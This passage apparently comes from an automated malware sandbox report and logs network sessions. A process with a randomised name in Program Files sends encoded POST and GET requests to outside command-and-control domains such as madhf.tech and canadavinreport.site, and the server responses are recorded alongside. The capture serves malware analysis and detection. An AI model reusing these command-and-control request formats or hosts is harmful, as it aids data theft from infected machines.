Jan 11, 2025 01:40:27.690835953 CET	1663	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 79 6d 31 32 76 35 61 48 43 48 54 6a 35 71 63 45 4f 76 59 38 33 4c 79 6a 6b 7a 31 66 71 72 46 2f 50 47 79 34 43 49 2f 6f 6a 41 63 45 77 2b 78 76 67 33 59 42 69 71 62 77 45 72 30 39 32 31 4e 67 74 75 4a 56 47 59 69 66 56 33 57 69 56 55 35 4e 54 78 52 34 4d 45 38 6a 66 45 59 4e 54 39 74 2b 4f 36 41 2b 6b 5a 61 2f 57 48 54 62 69 4e 4e 67 45 4b 78 51 4d 45 57 65 64 70 70 52 51 55 72 55 34 36 51 41 47 57 75 4c 30 77 61 2b 6c 50 61 57 6e 68 6b 79 54 6b 4b 4e 37 4f 51 50 64 6a 41 77 69 [TRUNCATED] Data Ascii: KBEhCJ=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aHCHTj5qcEOvY83Lyjkz1fqrF/PGy4CI/ojAcEw+xvg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNNgEKxQMEWedppRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOpHZ6pOzd7zPWroAm3Y219EVyzxxycqhnmctOoNURxKTLVSn1OtKs4UAePRIv7FA28CVtaAAgicOjT+T5dyCs+uvLwdAlJnFRv0o+K8/tioUSKtoCFZ6sa4++zhY3SZbYDs9LQGrm8Esoq4gI0mF4sIED4DDrGnem14MyBPCXp47F+8I6HD3/D5DXkFlhhWuzTLr1gy8pPWfys1Yoe06guZvO9hfsrMA86P3xtut0+s/RB1MTIgHaQiik1EOknpE0ntrPDn2cCNCdqO4zCjMlM7zQHMfaZ6XrI7LeLBc8uEzTLhEDxYggXJ2OJQcVi3VH5ikIgoOPTFm517j0SYB3v/bBxibkJmKq+7cm/lBT6TKpFWPZXZ3jcmOO/qmK3xmUIlaHWvivG+VThzA449Bdc5WR+fQP9yVYHRV7smQ8StRPXGPcpD3U4CEbHhm4H/YRYgLFcwKIvdggqjqgcrYunRUJCfAAV0V2gsKrj6XS8dhYeS09gEkoR/jjqTYjVxFDVpdM8LWgxENrg/dikgdYCnZEWh08LlSPtSa+n14HQaD1EOmKyJxNaxSKNKRlVhb+wxNtNjIU+opU+ha8++c5S [TRUNCATED]
Jan 11, 2025 01:40:28.282422066 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 00:40:28 GMT server: Apache set-cookie: __tad=1736556028.1834882; expires=Tue, 09-Jan-2035 00:40:28 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49984	103.224.182.242	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:30.335510969 CET	375	OUT	GET /0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.madhf.tech User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:40:30.942756891 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 00:40:30 GMT server: Apache set-cookie: __tad=1736556030.5512181; expires=Tue, 09-Jan-2035 00:40:30 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1526 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 4b 64 72 3d 52 4e 2d 48 4d 4e 6f 58 6a 36 70 58 6d 26 4b 42 45 68 43 4a 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 43 37 62 53 59 47 46 71 72 78 59 64 67 4a 54 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 2b 34 4e 77 49 70 54 6c 71 76 50 57 53 38 53 6c 34 70 35 56 6a 42 39 6a 34 39 4a 43 42 45 68 56 6d [TRUNCATED] Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcol
Jan 11, 2025 01:40:30.942800999 CET	562	IN	Data Raw: 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 Data Ascii: or="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49986	185.27.134.206	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:36.101294041 CET	656	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 67 69 52 55 67 66 44 79 71 47 64 6f 59 2b 6b 55 6b 4a 7a 46 34 66 37 32 49 44 54 42 54 6e 76 4b 59 49 46 4a 58 51 3d Data Ascii: KBEhCJ=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSigiRUgfDyqGdoY+kUkJzF4f72IDTBTnvKYIFJXQ=
Jan 11, 2025 01:40:36.707600117 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:40:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED] Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc\|`,<pwm0$QAMKqwx[Z1M$F~~n_{9\|.w>\|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49987	185.27.134.206	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:38.651045084 CET	676	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 7a 44 6d 62 4c 6b 51 6a 47 47 51 37 59 31 58 41 48 48 36 77 79 32 4c 6f 39 6f 75 35 47 6c 42 49 53 42 6f 32 56 4a Data Ascii: KBEhCJ=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWYzDmbLkQjGGQ7Y1XAHH6wy2Lo9ou5GlBISBo2VJ
Jan 11, 2025 01:40:39.254297972 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:40:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED] Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc\|`,<pwm0$QAMKqwx[Z1M$F~~n_{9\|.w>\|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49988	185.27.134.206	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:41.198714018 CET	1693	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 53 44 71 50 53 33 63 31 73 41 43 6f 72 5a 6b 34 62 2b 50 46 36 71 56 61 45 66 55 42 76 61 2b 42 4b 68 4d 66 56 51 6a 35 48 72 61 35 53 41 6a 69 35 41 7a 72 32 6b 55 66 65 4e 57 52 57 48 59 63 6a 67 58 75 79 74 73 36 52 52 56 72 73 70 63 2f 31 6d 53 44 48 66 59 64 75 6b 6c 76 65 53 50 61 62 39 7a 71 45 79 54 62 59 67 46 44 37 6f 6a 43 79 55 4b 47 5a 72 35 38 54 38 66 73 51 36 4b 32 6d 61 6c 68 34 78 38 6a 2f 64 62 2f 45 4f 51 44 4f 4e 54 79 43 36 66 70 44 79 57 63 74 65 63 63 47 [TRUNCATED] Data Ascii: KBEhCJ=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbSDqPS3c1sACorZk4b+PF6qVaEfUBva+BKhMfVQj5Hra5SAji5Azr2kUfeNWRWHYcjgXuyts6RRVrspc/1mSDHfYduklveSPab9zqEyTbYgFD7ojCyUKGZr58T8fsQ6K2malh4x8j/db/EOQDONTyC6fpDyWcteccGWLn99W6SQBuSXYcuxX40SaoH7rO+y2iOCnrRdWE+QxftWDhP/wF/ntsztKSbHDyRd5JqSD1ShNm1YYXQjbhPclz0HqBaCnmskGG1QpxYDiM2GPnELjp1YgVJ8swGzS0XpZs3CEq5NLkDp+wyXJWyeVStM7PHxnqpoMHhJ0GL1h+GNFTIGs0aq0Mgavd23939+wGTu7w/b675lszzPvmcrf7T3NFVcNzgxYEpW8dgLx3m4PiO+ajyoER2I6qpwVeLcVohdnQK7TSnLlmUWq8A7TCdkhQ7x7CsMVOfj2TzhgK3XzjuLU9kMvHE/B3HSDi83SholwdZC6+fR9K0sdrSieoAjNZjkCotUwlH4AmZetNXgRi7I2+FZADNboy49N4+iSteFVW2rO3K6VTlecRnDYaCan0sMUKhY0vqtU1eGphZdoNhqpForns1qFKSPcy4LToIAVkNMyn4ZwoO7VEd2xXj1Cd7VAsKiHjHqBbXT/TRel/lGI7p2qqoUTEKdkRB+dvXuP+qYBorr2UJcJjbrG+lUA3ztr2kruUgPwCnauTtP56oclxsXzqLD2n+QVSQr3BNVgayuP9lpekxT/NXI5kq0wppxCuxYb2776VjkNXEpELT9ceQRUr9Xk0NvvyYP+0//4HGnN6zyOpPGnOJ3cGfRKmd12L5YW [TRUNCATED]
Jan 11, 2025 01:40:41.791675091 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:40:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED] Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc\|`,<pwm0$QAMKqwx[Z1M$F~~n_{9\|.w>\|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49989	185.27.134.206	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:43.744018078 CET	385	OUT	GET /g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.canadavinreport.site User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:40:44.442990065 CET	1199	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:40:44 GMT Content-Type: text/html Content-Length: 998 Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED] Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var 